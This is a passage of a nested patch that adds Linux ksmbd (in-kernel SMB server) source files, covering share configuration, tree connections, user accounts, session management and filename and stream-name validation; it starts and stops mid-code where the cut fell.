++			       const char *filename)
++{
++	struct ksmbd_veto_pattern *p;
++
++	list_for_each_entry(p, &share->veto_list, list) {
++		if (match_wildcard(p->pattern, filename))
++			return true;
++	}
++	return false;
++}
+diff --git a/fs/smb/server/mgmt/share_config.h b/fs/smb/server/mgmt/share_config.h
+new file mode 100644
+index 0000000000000..3fd3382939421
+--- /dev/null
++++ b/fs/smb/server/mgmt/share_config.h
+@@ -0,0 +1,82 @@
++/* SPDX-License-Identifier: GPL-2.0-or-later */
++/*
++ *   Copyright (C) 2018 Samsung Electronics Co., Ltd.
++ */
++
++#ifndef __SHARE_CONFIG_MANAGEMENT_H__
++#define __SHARE_CONFIG_MANAGEMENT_H__
++
++#include <linux/workqueue.h>
++#include <linux/hashtable.h>
++#include <linux/path.h>
++#include <linux/unicode.h>
++
++struct ksmbd_share_config {
++	char			*name;
++	char			*path;
++
++	unsigned int		path_sz;
++	unsigned int		flags;
++	struct list_head	veto_list;
++
++	struct path		vfs_path;
++
++	atomic_t		refcount;
++	struct hlist_node	hlist;
++	unsigned short		create_mask;
++	unsigned short		directory_mask;
++	unsigned short		force_create_mode;
++	unsigned short		force_directory_mode;
++	unsigned short		force_uid;
++	unsigned short		force_gid;
++};
++
++#define KSMBD_SHARE_INVALID_UID	((__u16)-1)
++#define KSMBD_SHARE_INVALID_GID	((__u16)-1)
++
++static inline int share_config_create_mode(struct ksmbd_share_config *share,
++					   umode_t posix_mode)
++{
++	if (!share->force_create_mode) {
++		if (!posix_mode)
++			return share->create_mask;
++		else
++			return posix_mode & share->create_mask;
++	}
++	return share->force_create_mode & share->create_mask;
++}
++
++static inline int share_config_directory_mode(struct ksmbd_share_config *share,
++					      umode_t posix_mode)
++{
++	if (!share->force_directory_mode) {
++		if (!posix_mode)
++			return share->directory_mask;
++		else
++			return posix_mode & share->directory_mask;
++	}
++
++	return share->force_directory_mode & share->directory_mask;
++}
++
++static inline int test_share_config_flag(struct ksmbd_share_config *share,
++					 int flag)
++{
++	return share->flags & flag;
++}
++
++void ksmbd_share_config_del(struct ksmbd_share_config *share);
++void __ksmbd_share_config_put(struct ksmbd_share_config *share);
++
++static inline void ksmbd_share_config_put(struct ksmbd_share_config *share)
++{
++	if (!atomic_dec_and_test(&share->refcount))
++		return;
++	__ksmbd_share_config_put(share);
++}
++
++struct ksmbd_share_config *ksmbd_share_config_get(struct unicode_map *um,
++						  const char *name);
++bool ksmbd_share_veto_filename(struct ksmbd_share_config *share,
++			       const char *filename);
++#endif /* __SHARE_CONFIG_MANAGEMENT_H__ */
+diff --git a/fs/smb/server/mgmt/tree_connect.c b/fs/smb/server/mgmt/tree_connect.c
+new file mode 100644
+index 0000000000000..f07a05f376513
+--- /dev/null
++++ b/fs/smb/server/mgmt/tree_connect.c
+@@ -0,0 +1,147 @@
++// SPDX-License-Identifier: GPL-2.0-or-later
++/*
++ *   Copyright (C) 2018 Samsung Electronics Co., Ltd.
++ */
++
++#include <linux/list.h>
++#include <linux/slab.h>
++#include <linux/xarray.h>
++
++#include "../transport_ipc.h"
++#include "../connection.h"
++
++#include "tree_connect.h"
++#include "user_config.h"
++#include "share_config.h"
++#include "user_session.h"
++
++struct ksmbd_tree_conn_status
++ksmbd_tree_conn_connect(struct ksmbd_conn *conn, struct ksmbd_session *sess,
++			const char *share_name)
++{
++	struct ksmbd_tree_conn_status status = {-ENOENT, NULL};
++	struct ksmbd_tree_connect_response *resp = NULL;
++	struct ksmbd_share_config *sc;
++	struct ksmbd_tree_connect *tree_conn = NULL;
++	struct sockaddr *peer_addr;
++	int ret;
++
++	sc = ksmbd_share_config_get(conn->um, share_name);
++	if (!sc)
++		return status;
++
++	tree_conn = kzalloc(sizeof(struct ksmbd_tree_connect), GFP_KERNEL);
++	if (!tree_conn) {
++		status.ret = -ENOMEM;
++		goto out_error;
++	}
++
++	tree_conn->id = ksmbd_acquire_tree_conn_id(sess);
++	if (tree_conn->id < 0) {
++		status.ret = -EINVAL;
++		goto out_error;
++	}
++
++	peer_addr = KSMBD_TCP_PEER_SOCKADDR(conn);
++	resp = ksmbd_ipc_tree_connect_request(sess,
++					      sc,
++					      tree_conn,
++					      peer_addr);
++	if (!resp) {
++		status.ret = -EINVAL;
++		goto out_error;
++	}
++
++	status.ret = resp->status;
++	if (status.ret != KSMBD_TREE_CONN_STATUS_OK)
++		goto out_error;
++
++	tree_conn->flags = resp->connection_flags;
++	if (test_tree_conn_flag(tree_conn, KSMBD_TREE_CONN_FLAG_UPDATE)) {
++		struct ksmbd_share_config *new_sc;
++
++		ksmbd_share_config_del(sc);
++		new_sc = ksmbd_share_config_get(conn->um, share_name);
++		if (!new_sc) {
++			pr_err("Failed to update stale share config\n");
++			status.ret = -ESTALE;
++			goto out_error;
++		}
++		ksmbd_share_config_put(sc);
++		sc = new_sc;
++	}
++
++	tree_conn->user = sess->user;
++	tree_conn->share_conf = sc;
++	status.tree_conn = tree_conn;
++
++	ret = xa_err(xa_store(&sess->tree_conns, tree_conn->id, tree_conn,
++			      GFP_KERNEL));
++	if (ret) {
++		status.ret = -ENOMEM;
++		goto out_error;
++	}
++	kvfree(resp);
++	return status;
++
++out_error:
++	if (tree_conn)
++		ksmbd_release_tree_conn_id(sess, tree_conn->id);
++	ksmbd_share_config_put(sc);
++	kfree(tree_conn);
++	kvfree(resp);
++	return status;
++}
++
++int ksmbd_tree_conn_disconnect(struct ksmbd_session *sess,
++			       struct ksmbd_tree_connect *tree_conn)
++{
++	int ret;
++
++	ret = ksmbd_ipc_tree_disconnect_request(sess->id, tree_conn->id);
++	ksmbd_release_tree_conn_id(sess, tree_conn->id);
++	xa_erase(&sess->tree_conns, tree_conn->id);
++	ksmbd_share_config_put(tree_conn->share_conf);
++	kfree(tree_conn);
++	return ret;
++}
++
++struct ksmbd_tree_connect *ksmbd_tree_conn_lookup(struct ksmbd_session *sess,
++						  unsigned int id)
++{
++	struct ksmbd_tree_connect *tcon;
++
++	tcon = xa_load(&sess->tree_conns, id);
++	if (tcon) {
++		if (test_bit(TREE_CONN_EXPIRE, &tcon->status))
++			tcon = NULL;
++	}
++
++	return tcon;
++}
++
++struct ksmbd_share_config *ksmbd_tree_conn_share(struct ksmbd_session *sess,
++						 unsigned int id)
++{
++	struct ksmbd_tree_connect *tc;
++
++	tc = ksmbd_tree_conn_lookup(sess, id);
++	if (tc)
++		return tc->share_conf;
++	return NULL;
++}
++
++int ksmbd_tree_conn_session_logoff(struct ksmbd_session *sess)
++{
++	int ret = 0;
++	struct ksmbd_tree_connect *tc;
++	unsigned long id;
++
++	if (!sess)
++		return -EINVAL;
++
++	xa_for_each(&sess->tree_conns, id, tc)
++		ret |= ksmbd_tree_conn_disconnect(sess, tc);
++	xa_destroy(&sess->tree_conns);
++	return ret;
++}
+diff --git a/fs/smb/server/mgmt/tree_connect.h b/fs/smb/server/mgmt/tree_connect.h
+new file mode 100644
+index 0000000000000..700df36cf3e30
+--- /dev/null
++++ b/fs/smb/server/mgmt/tree_connect.h
+@@ -0,0 +1,61 @@
++/* SPDX-License-Identifier: GPL-2.0-or-later */
++/*
++ *   Copyright (C) 2018 Samsung Electronics Co., Ltd.
++ */
++
++#ifndef __TREE_CONNECT_MANAGEMENT_H__
++#define __TREE_CONNECT_MANAGEMENT_H__
++
++#include <linux/hashtable.h>
++
++#include "../ksmbd_netlink.h"
++
++struct ksmbd_share_config;
++struct ksmbd_user;
++struct ksmbd_conn;
++
++#define TREE_CONN_EXPIRE		1
++
++struct ksmbd_tree_connect {
++	int				id;
++
++	unsigned int			flags;
++	struct ksmbd_share_config	*share_conf;
++	struct ksmbd_user		*user;
++
++	struct list_head		list;
++
++	int				maximal_access;
++	bool				posix_extensions;
++	unsigned long			status;
++};
++
++struct ksmbd_tree_conn_status {
++	unsigned int			ret;
++	struct ksmbd_tree_connect	*tree_conn;
++};
++
++static inline int test_tree_conn_flag(struct ksmbd_tree_connect *tree_conn,
++				      int flag)
++{
++	return tree_conn->flags & flag;
++}
++
++struct ksmbd_session;
++
++struct ksmbd_tree_conn_status
++ksmbd_tree_conn_connect(struct ksmbd_conn *conn, struct ksmbd_session *sess,
++			const char *share_name);
++
++int ksmbd_tree_conn_disconnect(struct ksmbd_session *sess,
++			       struct ksmbd_tree_connect *tree_conn);
++
++struct ksmbd_tree_connect *ksmbd_tree_conn_lookup(struct ksmbd_session *sess,
++						  unsigned int id);
++
++struct ksmbd_share_config *ksmbd_tree_conn_share(struct ksmbd_session *sess,
++						 unsigned int id);
++
++int ksmbd_tree_conn_session_logoff(struct ksmbd_session *sess);
++
++#endif /* __TREE_CONNECT_MANAGEMENT_H__ */
+diff --git a/fs/smb/server/mgmt/user_config.c b/fs/smb/server/mgmt/user_config.c
+new file mode 100644
+index 0000000000000..279d00feff216
+--- /dev/null
++++ b/fs/smb/server/mgmt/user_config.c
+@@ -0,0 +1,79 @@
++// SPDX-License-Identifier: GPL-2.0-or-later
++/*
++ *   Copyright (C) 2018 Samsung Electronics Co., Ltd.
++ */
++
++#include <linux/slab.h>
++#include <linux/mm.h>
++
++#include "user_config.h"
++#include "../transport_ipc.h"
++
++struct ksmbd_user *ksmbd_login_user(const char *account)
++{
++	struct ksmbd_login_response *resp;
++	struct ksmbd_user *user = NULL;
++
++	resp = ksmbd_ipc_login_request(account);
++	if (!resp)
++		return NULL;
++
++	if (!(resp->status & KSMBD_USER_FLAG_OK))
++		goto out;
++
++	user = ksmbd_alloc_user(resp);
++out:
++	kvfree(resp);
++	return user;
++}
++
++struct ksmbd_user *ksmbd_alloc_user(struct ksmbd_login_response *resp)
++{
++	struct ksmbd_user *user = NULL;
++
++	user = kmalloc(sizeof(struct ksmbd_user), GFP_KERNEL);
++	if (!user)
++		return NULL;
++
++	user->name = kstrdup(resp->account, GFP_KERNEL);
++	user->flags = resp->status;
++	user->gid = resp->gid;
++	user->uid = resp->uid;
++	user->passkey_sz = resp->hash_sz;
++	user->passkey = kmalloc(resp->hash_sz, GFP_KERNEL);
++	if (user->passkey)
++		memcpy(user->passkey, resp->hash, resp->hash_sz);
++
++	if (!user->name || !user->passkey) {
++		kfree(user->name);
++		kfree(user->passkey);
++		kfree(user);
++		user = NULL;
++	}
++	return user;
++}
++
++void ksmbd_free_user(struct ksmbd_user *user)
++{
++	ksmbd_ipc_logout_request(user->name, user->flags);
++	kfree(user->name);
++	kfree(user->passkey);
++	kfree(user);
++}
++
++int ksmbd_anonymous_user(struct ksmbd_user *user)
++{
++	if (user->name[0] == '\0')
++		return 1;
++	return 0;
++}
++
++bool ksmbd_compare_user(struct ksmbd_user *u1, struct ksmbd_user *u2)
++{
++	if (strcmp(u1->name, u2->name))
++		return false;
++	if (memcmp(u1->passkey, u2->passkey, u1->passkey_sz))
++		return false;
++
++	return true;
++}
+diff --git a/fs/smb/server/mgmt/user_config.h b/fs/smb/server/mgmt/user_config.h
+new file mode 100644
+index 0000000000000..6a44109617f14
+--- /dev/null
++++ b/fs/smb/server/mgmt/user_config.h
+@@ -0,0 +1,68 @@
++/* SPDX-License-Identifier: GPL-2.0-or-later */
++/*
++ *   Copyright (C) 2018 Samsung Electronics Co., Ltd.
++ */
++
++#ifndef __USER_CONFIG_MANAGEMENT_H__
++#define __USER_CONFIG_MANAGEMENT_H__
++
++#include "../glob.h"
++
++struct ksmbd_user {
++	unsigned short		flags;
++
++	unsigned int		uid;
++	unsigned int		gid;
++
++	char			*name;
++
++	size_t			passkey_sz;
++	char			*passkey;
++	unsigned int		failed_login_count;
++};
++
++static inline bool user_guest(struct ksmbd_user *user)
++{
++	return user->flags & KSMBD_USER_FLAG_GUEST_ACCOUNT;
++}
++
++static inline void set_user_flag(struct ksmbd_user *user, int flag)
++{
++	user->flags |= flag;
++}
++
++static inline int test_user_flag(struct ksmbd_user *user, int flag)
++{
++	return user->flags & flag;
++}
++
++static inline void set_user_guest(struct ksmbd_user *user)
++{
++}
++
++static inline char *user_passkey(struct ksmbd_user *user)
++{
++	return user->passkey;
++}
++
++static inline char *user_name(struct ksmbd_user *user)
++{
++	return user->name;
++}
++
++static inline unsigned int user_uid(struct ksmbd_user *user)
++{
++	return user->uid;
++}
++
++static inline unsigned int user_gid(struct ksmbd_user *user)
++{
++	return user->gid;
++}
++
++struct ksmbd_user *ksmbd_login_user(const char *account);
++struct ksmbd_user *ksmbd_alloc_user(struct ksmbd_login_response *resp);
++void ksmbd_free_user(struct ksmbd_user *user);
++int ksmbd_anonymous_user(struct ksmbd_user *user);
++bool ksmbd_compare_user(struct ksmbd_user *u1, struct ksmbd_user *u2);
++#endif /* __USER_CONFIG_MANAGEMENT_H__ */
+diff --git a/fs/smb/server/mgmt/user_session.c b/fs/smb/server/mgmt/user_session.c
+new file mode 100644
+index 0000000000000..ea4b56d570fbb
+--- /dev/null
++++ b/fs/smb/server/mgmt/user_session.c
+@@ -0,0 +1,400 @@
++// SPDX-License-Identifier: GPL-2.0-or-later
++/*
++ *   Copyright (C) 2018 Samsung Electronics Co., Ltd.
++ */
++
++#include <linux/list.h>
++#include <linux/slab.h>
++#include <linux/rwsem.h>
++#include <linux/xarray.h>
++
++#include "ksmbd_ida.h"
++#include "user_session.h"
++#include "user_config.h"
++#include "tree_connect.h"
++#include "../transport_ipc.h"
++#include "../connection.h"
++#include "../vfs_cache.h"
++
++static DEFINE_IDA(session_ida);
++
++#define SESSION_HASH_BITS		3
++static DEFINE_HASHTABLE(sessions_table, SESSION_HASH_BITS);
++static DECLARE_RWSEM(sessions_table_lock);
++
++struct ksmbd_session_rpc {
++	int			id;
++	unsigned int		method;
++	struct list_head	list;
++};
++
++static void free_channel_list(struct ksmbd_session *sess)
++{
++	struct channel *chann;
++	unsigned long index;
++
++	xa_for_each(&sess->ksmbd_chann_list, index, chann) {
++		xa_erase(&sess->ksmbd_chann_list, index);
++		kfree(chann);
++	}
++
++	xa_destroy(&sess->ksmbd_chann_list);
++}
++
++static void __session_rpc_close(struct ksmbd_session *sess,
++				struct ksmbd_session_rpc *entry)
++{
++	struct ksmbd_rpc_command *resp;
++
++	resp = ksmbd_rpc_close(sess, entry->id);
++	if (!resp)
++		pr_err("Unable to close RPC pipe %d\n", entry->id);
++
++	kvfree(resp);
++	ksmbd_rpc_id_free(entry->id);
++	kfree(entry);
++}
++
++static void ksmbd_session_rpc_clear_list(struct ksmbd_session *sess)
++{
++	struct ksmbd_session_rpc *entry;
++
++	while (!list_empty(&sess->rpc_handle_list)) {
++		entry = list_entry(sess->rpc_handle_list.next,
++				   struct ksmbd_session_rpc,
++				   list);
++
++		list_del(&entry->list);
++		__session_rpc_close(sess, entry);
++	}
++}
++
++static int __rpc_method(char *rpc_name)
++{
++	if (!strcmp(rpc_name, "\\srvsvc") || !strcmp(rpc_name, "srvsvc"))
++		return KSMBD_RPC_SRVSVC_METHOD_INVOKE;
++
++	if (!strcmp(rpc_name, "\\wkssvc") || !strcmp(rpc_name, "wkssvc"))
++		return KSMBD_RPC_WKSSVC_METHOD_INVOKE;
++
++	if (!strcmp(rpc_name, "LANMAN") || !strcmp(rpc_name, "lanman"))
++		return KSMBD_RPC_RAP_METHOD;
++
++	if (!strcmp(rpc_name, "\\samr") || !strcmp(rpc_name, "samr"))
++		return KSMBD_RPC_SAMR_METHOD_INVOKE;
++
++	if (!strcmp(rpc_name, "\\lsarpc") || !strcmp(rpc_name, "lsarpc"))
++		return KSMBD_RPC_LSARPC_METHOD_INVOKE;
++
++	pr_err("Unsupported RPC: %s\n", rpc_name);
++	return 0;
++}
++
++int ksmbd_session_rpc_open(struct ksmbd_session *sess, char *rpc_name)
++{
++	struct ksmbd_session_rpc *entry;
++	struct ksmbd_rpc_command *resp;
++	int method;
++
++	method = __rpc_method(rpc_name);
++	if (!method)
++		return -EINVAL;
++
++	entry = kzalloc(sizeof(struct ksmbd_session_rpc), GFP_KERNEL);
++	if (!entry)
++		return -EINVAL;
++
++	list_add(&entry->list, &sess->rpc_handle_list);
++	entry->method = method;
++	entry->id = ksmbd_ipc_id_alloc();
++	if (entry->id < 0)
++		goto free_entry;
++
++	resp = ksmbd_rpc_open(sess, entry->id);
++	if (!resp)
++		goto free_id;
++
++	kvfree(resp);
++	return entry->id;
++free_id:
++	ksmbd_rpc_id_free(entry->id);
++free_entry:
++	list_del(&entry->list);
++	kfree(entry);
++	return -EINVAL;
++}
++
++void ksmbd_session_rpc_close(struct ksmbd_session *sess, int id)
++{
++	struct ksmbd_session_rpc *entry;
++
++	list_for_each_entry(entry, &sess->rpc_handle_list, list) {
++		if (entry->id == id) {
++			list_del(&entry->list);
++			__session_rpc_close(sess, entry);
++			break;
++		}
++	}
++}
++
++int ksmbd_session_rpc_method(struct ksmbd_session *sess, int id)
++{
++	struct ksmbd_session_rpc *entry;
++
++	list_for_each_entry(entry, &sess->rpc_handle_list, list) {
++		if (entry->id == id)
++			return entry->method;
++	}
++	return 0;
++}
++
++void ksmbd_session_destroy(struct ksmbd_session *sess)
++{
++	if (!sess)
++		return;
++
++	if (sess->user)
++		ksmbd_free_user(sess->user);
++
++	ksmbd_tree_conn_session_logoff(sess);
++	ksmbd_destroy_file_table(&sess->file_table);
++	ksmbd_session_rpc_clear_list(sess);
++	free_channel_list(sess);
++	kfree(sess->Preauth_HashValue);
++	ksmbd_release_id(&session_ida, sess->id);
++	kfree(sess);
++}
++
++static struct ksmbd_session *__session_lookup(unsigned long long id)
++{
++	struct ksmbd_session *sess;
++
++	hash_for_each_possible(sessions_table, sess, hlist, id) {
++		if (id == sess->id) {
++			sess->last_active = jiffies;
++			return sess;
++		}
++	}
++	return NULL;
++}
++
++static void ksmbd_expire_session(struct ksmbd_conn *conn)
++{
++	unsigned long id;
++	struct ksmbd_session *sess;
++
++	down_write(&sessions_table_lock);
++	xa_for_each(&conn->sessions, id, sess) {
++		if (sess->state != SMB2_SESSION_VALID ||
++		    time_after(jiffies,
++			       sess->last_active + SMB2_SESSION_TIMEOUT)) {
++			xa_erase(&conn->sessions, sess->id);
++			hash_del(&sess->hlist);
++			ksmbd_session_destroy(sess);
++			continue;
++		}
++	}
++	up_write(&sessions_table_lock);
++}
++
++int ksmbd_session_register(struct ksmbd_conn *conn,
++			   struct ksmbd_session *sess)
++{
++	sess->dialect = conn->dialect;
++	memcpy(sess->ClientGUID, conn->ClientGUID, SMB2_CLIENT_GUID_SIZE);
++	ksmbd_expire_session(conn);
++	return xa_err(xa_store(&conn->sessions, sess->id, sess, GFP_KERNEL));
++}
++
++static int ksmbd_chann_del(struct ksmbd_conn *conn, struct ksmbd_session *sess)
++{
++	struct channel *chann;
++
++	chann = xa_erase(&sess->ksmbd_chann_list, (long)conn);
++	if (!chann)
++		return -ENOENT;
++
++	kfree(chann);
++	return 0;
++}
++
++void ksmbd_sessions_deregister(struct ksmbd_conn *conn)
++{
++	struct ksmbd_session *sess;
++	unsigned long id;
++
++	down_write(&sessions_table_lock);
++	if (conn->binding) {
++		int bkt;
++		struct hlist_node *tmp;
++
++		hash_for_each_safe(sessions_table, bkt, tmp, sess, hlist) {
++			if (!ksmbd_chann_del(conn, sess) &&
++			    xa_empty(&sess->ksmbd_chann_list)) {
++				hash_del(&sess->hlist);
++				ksmbd_session_destroy(sess);
++			}
++		}
++	}
++
++	xa_for_each(&conn->sessions, id, sess) {
++		unsigned long chann_id;
++		struct channel *chann;
++
++		xa_for_each(&sess->ksmbd_chann_list, chann_id, chann) {
++			if (chann->conn != conn)
++				ksmbd_conn_set_exiting(chann->conn);
++		}
++
++		ksmbd_chann_del(conn, sess);
++		if (xa_empty(&sess->ksmbd_chann_list)) {
++			xa_erase(&conn->sessions, sess->id);
++			hash_del(&sess->hlist);
++			ksmbd_session_destroy(sess);
++		}
++	}
++	up_write(&sessions_table_lock);
++}
++
++struct ksmbd_session *ksmbd_session_lookup(struct ksmbd_conn *conn,
++					   unsigned long long id)
++{
++	struct ksmbd_session *sess;
++
++	sess = xa_load(&conn->sessions, id);
++	if (sess)
++		sess->last_active = jiffies;
++	return sess;
++}
++
++struct ksmbd_session *ksmbd_session_lookup_slowpath(unsigned long long id)
++{
++	struct ksmbd_session *sess;
++
++	down_read(&sessions_table_lock);
++	sess = __session_lookup(id);
++	if (sess)
++		sess->last_active = jiffies;
++	up_read(&sessions_table_lock);
++
++	return sess;
++}
++
++struct ksmbd_session *ksmbd_session_lookup_all(struct ksmbd_conn *conn,
++					       unsigned long long id)
++{
++	struct ksmbd_session *sess;
++
++	sess = ksmbd_session_lookup(conn, id);
++	if (!sess && conn->binding)
++		sess = ksmbd_session_lookup_slowpath(id);
++	if (sess && sess->state != SMB2_SESSION_VALID)
++		sess = NULL;
++	return sess;
++}
++
++struct preauth_session *ksmbd_preauth_session_alloc(struct ksmbd_conn *conn,
++						    u64 sess_id)
++{
++	struct preauth_session *sess;
++
++	sess = kmalloc(sizeof(struct preauth_session), GFP_KERNEL);
++	if (!sess)
++		return NULL;
++
++	sess->id = sess_id;
++	memcpy(sess->Preauth_HashValue, conn->preauth_info->Preauth_HashValue,
++	       PREAUTH_HASHVALUE_SIZE);
++	list_add(&sess->preauth_entry, &conn->preauth_sess_table);
++
++	return sess;
++}
++
++static bool ksmbd_preauth_session_id_match(struct preauth_session *sess,
++					   unsigned long long id)
++{
++	return sess->id == id;
++}
++
++struct preauth_session *ksmbd_preauth_session_lookup(struct ksmbd_conn *conn,
++						     unsigned long long id)
++{
++	struct preauth_session *sess = NULL;
++
++	list_for_each_entry(sess, &conn->preauth_sess_table, preauth_entry) {
++		if (ksmbd_preauth_session_id_match(sess, id))
++			return sess;
++	}
++	return NULL;
++}
++
++static int __init_smb2_session(struct ksmbd_session *sess)
++{
++	int id = ksmbd_acquire_smb2_uid(&session_ida);
++
++	if (id < 0)
++		return -EINVAL;
++	sess->id = id;
++	return 0;
++}
++
++static struct ksmbd_session *__session_create(int protocol)
++{
++	struct ksmbd_session *sess;
++	int ret;
++
++	if (protocol != CIFDS_SESSION_FLAG_SMB2)
++		return NULL;
++
++	sess = kzalloc(sizeof(struct ksmbd_session), GFP_KERNEL);
++	if (!sess)
++		return NULL;
++
++	if (ksmbd_init_file_table(&sess->file_table))
++		goto error;
++
++	sess->last_active = jiffies;
++	sess->state = SMB2_SESSION_IN_PROGRESS;
++	set_session_flag(sess, protocol);
++	xa_init(&sess->tree_conns);
++	xa_init(&sess->ksmbd_chann_list);
++	INIT_LIST_HEAD(&sess->rpc_handle_list);
++	sess->sequence_number = 1;
++
++	ret = __init_smb2_session(sess);
++	if (ret)
++		goto error;
++
++	ida_init(&sess->tree_conn_ida);
++
++	down_write(&sessions_table_lock);
++	hash_add(sessions_table, &sess->hlist, sess->id);
++	up_write(&sessions_table_lock);
++
++	return sess;
++
++error:
++	ksmbd_session_destroy(sess);
++	return NULL;
++}
++
++struct ksmbd_session *ksmbd_smb2_session_create(void)
++{
++	return __session_create(CIFDS_SESSION_FLAG_SMB2);
++}
++
++int ksmbd_acquire_tree_conn_id(struct ksmbd_session *sess)
++{
++	int id = -EINVAL;
++
++	if (test_session_flag(sess, CIFDS_SESSION_FLAG_SMB2))
++		id = ksmbd_acquire_smb2_tid(&sess->tree_conn_ida);
++
++	return id;
++}
++
++void ksmbd_release_tree_conn_id(struct ksmbd_session *sess, int id)
++{
++	if (id >= 0)
++		ksmbd_release_id(&sess->tree_conn_ida, id);
++}
+diff --git a/fs/smb/server/mgmt/user_session.h b/fs/smb/server/mgmt/user_session.h
+new file mode 100644
+index 0000000000000..51f38e5b61abb
+--- /dev/null
++++ b/fs/smb/server/mgmt/user_session.h
+@@ -0,0 +1,103 @@
++/* SPDX-License-Identifier: GPL-2.0-or-later */
++/*
++ *   Copyright (C) 2018 Samsung Electronics Co., Ltd.
++ */
++
++#ifndef __USER_SESSION_MANAGEMENT_H__
++#define __USER_SESSION_MANAGEMENT_H__
++
++#include <linux/hashtable.h>
++#include <linux/xarray.h>
++
++#include "../smb_common.h"
++#include "../ntlmssp.h"
++
++#define CIFDS_SESSION_FLAG_SMB2		BIT(1)
++
++#define PREAUTH_HASHVALUE_SIZE		64
++
++struct ksmbd_file_table;
++
++struct channel {
++	__u8			smb3signingkey[SMB3_SIGN_KEY_SIZE];
++	struct ksmbd_conn	*conn;
++};
++
++struct preauth_session {
++	__u8			Preauth_HashValue[PREAUTH_HASHVALUE_SIZE];
++	u64			id;
++	struct list_head	preauth_entry;
++};
++
++struct ksmbd_session {
++	u64				id;
++
++	__u16				dialect;
++	char				ClientGUID[SMB2_CLIENT_GUID_SIZE];
++
++	struct ksmbd_user		*user;
++	unsigned int			sequence_number;
++	unsigned int			flags;
++
++	bool				sign;
++	bool				enc;
++	bool				is_anonymous;
++
++	int				state;
++	__u8				*Preauth_HashValue;
++
++	char				sess_key[CIFS_KEY_SIZE];
++
++	struct hlist_node		hlist;
++	struct xarray			ksmbd_chann_list;
++	struct xarray			tree_conns;
++	struct ida			tree_conn_ida;
++	struct list_head		rpc_handle_list;
++
++	__u8				smb3encryptionkey[SMB3_ENC_DEC_KEY_SIZE];
++	__u8				smb3decryptionkey[SMB3_ENC_DEC_KEY_SIZE];
++	__u8				smb3signingkey[SMB3_SIGN_KEY_SIZE];
++
++	struct ksmbd_file_table		file_table;
++	unsigned long			last_active;
++};
++
++static inline int test_session_flag(struct ksmbd_session *sess, int bit)
++{
++	return sess->flags & bit;
++}
++
++static inline void set_session_flag(struct ksmbd_session *sess, int bit)
++{
++	sess->flags |= bit;
++}
++
++static inline void clear_session_flag(struct ksmbd_session *sess, int bit)
++{
++	sess->flags &= ~bit;
++}
++
++struct ksmbd_session *ksmbd_smb2_session_create(void);
++
++void ksmbd_session_destroy(struct ksmbd_session *sess);
++
++struct ksmbd_session *ksmbd_session_lookup_slowpath(unsigned long long id);
++struct ksmbd_session *ksmbd_session_lookup(struct ksmbd_conn *conn,
++					   unsigned long long id);
++int ksmbd_session_register(struct ksmbd_conn *conn,
++			   struct ksmbd_session *sess);
++void ksmbd_sessions_deregister(struct ksmbd_conn *conn);
++struct ksmbd_session *ksmbd_session_lookup_all(struct ksmbd_conn *conn,
++					       unsigned long long id);
++struct preauth_session *ksmbd_preauth_session_alloc(struct ksmbd_conn *conn,
++						    u64 sess_id);
++struct preauth_session *ksmbd_preauth_session_lookup(struct ksmbd_conn *conn,
++						     unsigned long long id);
++
++int ksmbd_acquire_tree_conn_id(struct ksmbd_session *sess);
++void ksmbd_release_tree_conn_id(struct ksmbd_session *sess, int id);
++
++int ksmbd_session_rpc_open(struct ksmbd_session *sess, char *rpc_name);
++void ksmbd_session_rpc_close(struct ksmbd_session *sess, int id);
++int ksmbd_session_rpc_method(struct ksmbd_session *sess, int id);
++#endif /* __USER_SESSION_MANAGEMENT_H__ */
+diff --git a/fs/smb/server/misc.c b/fs/smb/server/misc.c
+new file mode 100644
+index 0000000000000..9e8afaa686e3a
+--- /dev/null
++++ b/fs/smb/server/misc.c
+@@ -0,0 +1,381 @@
++// SPDX-License-Identifier: GPL-2.0-or-later
++/*
++ *   Copyright (C) 2016 Namjae Jeon <linkinjeon@kernel.org>
++ *   Copyright (C) 2018 Samsung Electronics Co., Ltd.
++ */
++
++#include <linux/kernel.h>
++#include <linux/xattr.h>
++#include <linux/fs.h>
++#include <linux/unicode.h>
++
++#include "misc.h"
++#include "smb_common.h"
++#include "connection.h"
++#include "vfs.h"
++
++#include "mgmt/share_config.h"
++
++/**
++ * match_pattern() - compare a string with a pattern which might include
++ * wildcard '*' and '?'
++ * TODO : implement consideration about DOS_DOT, DOS_QM and DOS_STAR
++ *
++ * @str:	string to compare with a pattern
++ * @len:	string length
++ * @pattern:	pattern string which might include wildcard '*' and '?'
++ *
++ * Return:	0 if pattern matched with the string, otherwise non zero value
++ */
++int match_pattern(const char *str, size_t len, const char *pattern)
++{
++	const char *s = str;
++	const char *p = pattern;
++	bool star = false;
++
++	while (*s && len) {
++		switch (*p) {
++		case '?':
++			s++;
++			len--;
++			p++;
++			break;
++		case '*':
++			star = true;
++			str = s;
++			if (!*++p)
++				return true;
++			pattern = p;
++			break;
++		default:
++			if (tolower(*s) == tolower(*p)) {
++				s++;
++				len--;
++				p++;
++			} else {
++				if (!star)
++					return false;
++				str++;
++				s = str;
++				p = pattern;
++			}
++			break;
++		}
++	}
++
++	if (*p == '*')
++		++p;
++	return !*p;
++}
++
++/*
++ * is_char_allowed() - check for valid character
++ * @ch:		input character to be checked
++ *
++ * Return:	1 if char is allowed, otherwise 0
++ */
++static inline int is_char_allowed(char ch)
++{
++	/* check for control chars, wildcards etc. */
++	if (!(ch & 0x80) &&
++	    (ch <= 0x1f ||
++	     ch == '?' || ch == '"' || ch == '<' ||
++	     ch == '>' || ch == '|' || ch == '*'))
++		return 0;
++
++	return 1;
++}
++
++int ksmbd_validate_filename(char *filename)
++{
++	while (*filename) {
++		char c = *filename;
++
++		filename++;
++		if (!is_char_allowed(c)) {
++			ksmbd_debug(VFS, "File name validation failed: 0x%x\n", c);
++			return -ENOENT;
++		}
++	}
++
++	return 0;
++}
++
++static int ksmbd_validate_stream_name(char *stream_name)
++{
++	while (*stream_name) {
++		char c = *stream_name;
++
++		stream_name++;
++		if (c == '/' || c == ':' || c == '\\') {
++			pr_err("Stream name validation failed: %c\n", c);
++			return -ENOENT;
++		}
++	}
++
++	return 0;
++}
++
++int parse_stream_name(char *filename, char **stream_name, int *s_type)
++{
++	char *stream_type;
++	char *s_name;
++	int rc = 0;
++
++	s_name = filename;
++	filename = strsep(&s_name, ":");
++	ksmbd_debug(SMB, "filename : %s, streams : %s\n", filename, s_name);
++	if (strchr(s_name, ':')) {
++		stream_type = s_name;
++		s_name = strsep(&stream_type, ":");
++
++		rc = ksmbd_validate_stream_name(s_name);
++		if (rc < 0) {
++			rc = -ENOENT;
++			goto out;
++		}
++
